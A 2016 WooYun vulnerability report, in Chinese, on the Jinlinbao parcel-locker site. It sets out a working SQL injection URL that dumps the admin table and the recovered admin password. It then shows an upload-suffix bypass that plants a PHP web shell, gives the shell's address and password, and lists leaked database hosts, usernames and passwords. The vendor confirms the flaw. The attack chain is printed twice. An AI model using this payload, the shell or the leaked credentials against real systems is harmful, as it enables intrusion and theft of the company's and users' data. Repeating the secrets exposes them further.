当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191426

漏洞标题:近邻宝主站Getshell可内网涉及数据库信息

相关厂商:近邻宝

漏洞作者: 路人甲

提交时间:2016-04-01 16:08

修复时间:2016-05-16 18:10

公开时间:2016-05-16 18:10

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已经确认,细节仅向厂商公开
2016-04-11: 细节向核心白帽子及相关领域专家公开
2016-04-21: 细节向普通白帽子公开
2016-05-01: 细节向实习白帽子公开
2016-05-16: 细节向公众公开

简要描述:

近邻宝主站getshell

详细说明:

首先是主站SQLI:

http://www.jinlinbao.com/?list_con/lm/222/id/-77%20union%20select%201,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,password%29,13,14,15,16,17%20from+mx_user%20limit%201,1.html


得到系统管理员账户密码:
root:jlb20150123
猜了下后台:
http://www.jinlinbao.com/jlb
直接登录

houtai.jpg


可以修改上传文件后缀

houtai2.png


直接getshell

houtai3.png


shell地址:
http://www.jinlinbao.com/asset/mxupload/up0352604001459443106.php woo
涉及大量数据库信息
"DB_HOST" => "10.1.0.212:3346", //数据库链接地址
"DB_USER" => "jinlinbao", //数据库用户名
"DB_PW" => "JinLinBaoMySQLDB", //数据库密码
"DB_NAME" => "jinlb" //数据库名称
rdsuiyq3auiyq3a.mysql.rds.aliyuncs.com","zkfc","zkfc20140613

漏洞证明:

首先是主站SQLI:

http://www.jinlinbao.com/?list_con/lm/222/id/-77%20union%20select%201,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,password%29,13,14,15,16,17%20from+mx_user%20limit%201,1.html


得到系统管理员账户密码:
root:jlb20150123
猜了下后台:
http://www.jinlinbao.com/jlb
直接登录

houtai.jpg


可以修改上传文件后缀

houtai2.png


直接getshell

houtai3.png


shell地址:
http://www.jinlinbao.com/asset/mxupload/up0352604001459443106.php woo
涉及大量数据库信息
"DB_HOST" => "10.1.0.212:3346", //数据库链接地址
"DB_USER" => "jinlinbao", //数据库用户名
"DB_PW" => "JinLinBaoMySQLDB", //数据库密码
"DB_NAME" => "jinlb" //数据库名称
rdsuiyq3auiyq3a.mysql.rds.aliyuncs.com","zkfc","zkfc20140613

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-04-01 18:06

厂商回复:

非常感谢,之前外包出去的,有些sql都没有做转义。

最新状态:

暂无